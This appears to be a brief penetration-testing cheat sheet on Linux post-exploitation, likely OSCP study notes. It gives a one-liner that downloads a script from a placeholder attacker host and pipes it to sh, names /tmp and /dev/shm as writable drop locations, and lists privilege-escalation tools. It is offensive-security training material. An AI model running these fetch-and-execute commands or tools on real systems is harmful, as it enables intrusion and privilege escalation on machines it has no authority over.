Linux post exploitation scripts
Words of wisdom
Execution of script
wget http://<Attacker_IP>/<script_name> | sh | tee output.txt
# This will pull file from attacker box and execute it and also store output to txt fileCommon Location with writable permissions to download and execute scripts
/tmp
/dev/shmbangenum.sh (initial linux enumeration)
wget https://raw.githubusercontent.com/bngr/OSCP-Scripts/master/bangenum.sh
sed -i -e 's/\r$//' bangenum.sh
./bangenum.shPSPY
https://github.com/DominicBreuker/pspylinux-smart-enumeration
SUID search
xploit_installer.py (exploit suggester)
Unix Priv checker
linux-local-enum.sh
linuxprivchecker.py
linux-exploit-suggestor.sh
unix-privesc-check.sh
KernelPop
Check Your sudo Version
sudo VersionLast updated